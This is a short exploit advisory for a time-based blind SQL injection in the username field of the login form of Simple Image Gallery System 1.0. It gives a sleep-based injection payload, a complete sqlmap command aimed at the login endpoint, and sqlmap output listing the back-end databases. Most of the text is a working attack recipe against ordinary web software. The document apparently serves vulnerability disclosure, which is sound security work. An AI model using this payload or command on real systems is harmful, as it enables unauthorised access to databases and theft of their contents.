Simple Image Gallery System 1.0 - SQL Injection (Time-Based blind)


The Simple Image Gallery System 1.0 application is vulnerable to SQL injection through the “username” parameter in the authentication form.

Proof of concept

Use the following payload in the username field and type any password.


'oR sLEeP(10);#

PoC from the web browser


Once it is evident that the loading of the site takes 10 seconds, we can execute the following command with the SQLMap tool:

SQLMap command

 sqlmap -u "http://[IP/HOST]:PORT/gallery/classes/Login.php?f=login" --data "username=admin&password=123456" --dbs --batch  
<-- SNIP -->  
 Parameter: username (POST)  
   Type: time-based blind  
   Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
   Payload: username=admin' AND (SELECT 6178 FROM (SELECT(SLEEP(5)))VfMt) AND 'YJYU'='YJYU&password=123456  
 [INFO] the back-end DBMS is MySQL  
 web server operating system: Linux Ubuntu 18.04 (bionic)  
 web application technology: Apache 2.4.29  
 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)  
 [INFO] fetching database names  
 [INFO] fetching number of databases  
 [INFO] resumed: 2  
 [INFO] resumed: gallery_db  
 [INFO] resumed: information_schema  
 available databases [2]:  
 [*] gallery_db  
 [*] information_schema

Exploitation with SQLMap tool